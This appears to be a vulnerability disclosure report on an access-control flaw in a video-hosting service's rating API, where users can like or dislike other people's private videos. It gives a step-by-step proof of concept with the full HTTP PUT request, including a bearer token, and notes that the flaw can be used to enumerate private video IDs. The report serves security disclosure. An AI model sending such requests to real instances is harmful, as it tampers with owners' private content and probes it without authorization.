Description

The app doesn’t check the status of video when making data changes. Normal users can rating like or dislike in private videos.

Proof of Concept

note: I’m using instance p.lu for testing

• Step 1: Login as video test1 and upload private video. Get video ID of private video
• Step 2: Call this request with Token from user test2

PUT /api/v1/videos/53328/rate HTTP/2
Host: p.lu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer d8163b600e3de89c6039af034a94bd3898d68825
Content-Type: application/json
Content-Length: 17
Origin: https://p.lu
Referer: https://p.lu/w/87rzixn5tGiFBA5iojv9RP
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"rating":"like"}

• Step 3: In browser of user test1, you can see count of like for video is 1.
• PoC:

send_rating: https://drive.google.com/file/d/1kSSCkCZZEINBwlupH49hJa3b5xjzUCJs/view?usp=sharing

1 like and 1 dislike in private video: https://drive.google.com/file/d/1OqfoJwTguSPDO0qElDSZKjzBqJXbwScW/view?usp=sharing

Impact

Attackers can send rating for private videos. It can be abused to list the id’s of private videos based on the response when making API call.